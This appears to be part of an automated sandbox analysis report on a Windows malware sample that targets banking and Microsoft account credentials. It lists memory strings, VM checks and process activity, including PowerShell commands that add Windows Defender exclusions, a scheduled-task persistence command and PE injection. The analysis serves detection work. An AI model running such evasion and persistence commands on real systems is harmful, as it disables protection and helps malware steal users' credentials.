Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597712
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596391
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594641
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594531
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594422

Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 0000000F.00000002.2858338582.000002C694C50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2857580591.000002C68F629000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: wiSeRRwvZHTk.exe, 0000000A.00000002.951366048.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: OtldpQxzAw.exe, 00000009.00000002.3302666078.0000000000E26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3303444188.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Code function: 9_2_068898D0 LdrInitializeThunk,

9_2_068898D0

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Memory written: C:\Users\user\Desktop\OtldpQxzAw.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Memory written: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Process created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Users\user\Desktop\OtldpQxzAw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
